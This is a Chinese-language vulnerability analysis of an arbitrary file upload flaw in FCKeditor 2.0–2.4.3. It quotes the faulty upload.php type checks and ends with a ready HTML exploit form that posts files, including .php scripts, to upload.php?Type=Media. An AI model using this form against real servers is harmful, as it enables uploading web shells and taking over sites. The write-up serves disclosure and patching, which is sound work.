FCKeditor 2.0-2.4.3漏洞分析

发布日期：2010-11.11
发布作者：grabz

影响版本：FCKeditor 2.0-2.4.3
官方地址：http://sourceforge.net/projects/fckeditor/
 

漏洞分析：

version 2.0 - 2.2

FCKeditor/editor/filemanager/upload/php/upload.php

#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

#

#// Get the allowed and denied extensions arrays.

#$arAllowed = $Config['AllowedExtensions'][$sType] ;

#$arDenied = $Config['DeniedExtensions'][$sType] ;
 

这里我们发送任何类型未在文件、FLASH、图片和文本上传扩展名“.php”的文件。

 

version 2.3.0 - 2.4.3:

 FCKeditor/editor/filemanager/upload/php/upload.php

#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

#// Check if it is an allowed type.

#if ( !in_array( $sType, array('File','Image','Flash','Media') ) )

# SendResults( 1, '', '', 'Invalid type specified' ) ;

#// Get the allowed and denied extensions arrays.

#$arAllowed = $Config['AllowedExtensions'][$sType] ;

#$arDenied = $Config['DeniedExtensions'][$sType] ;

in this code we can see filter by Type, but in config.php

$Config['AllowedExtensions']['Media'] and

$Config['DeniedExtensions']['Media'] not exists))

当发送类型为media时，可以上传任意文件。

Exploit

<form enctype="multipart/form-data" action="    http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media"    method="post">    <input name="NewFile" type="file">       <input type="submit" value="submit">    </form>    

 

标签分类： 文件上传